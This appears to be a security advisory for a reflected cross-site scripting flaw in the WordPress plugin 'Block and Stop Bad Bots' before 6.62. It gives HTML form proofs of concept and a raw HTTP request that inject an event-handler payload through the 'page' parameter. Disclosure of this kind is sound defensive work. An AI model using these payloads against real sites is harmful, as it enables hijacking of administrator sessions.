Block and Stop Bad Bots < 6.62 – Reflected Cross-Site Scripting

Description

The plugin does not escape the page parameter before outputting it back in attributes, leading to a Reflected Cross-Site Scripting issues

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=sbb_my-custom-submenu-page" method="POST">
      <input type="hidden" name="page" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=sbb_my-custom-submenu-page2" method="POST">
      <input type="hidden" name="page" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=sbb_my-custom-submenu-page3" method="POST">
      <input type="hidden" name="page" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


POST /wp-admin/admin.php?page=sbb_my-custom-submenu-page HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

page=%22%20style%3danimation-name%3arotation%20onanimationstart%3dalert(%2fXSS%2f)%2f%2f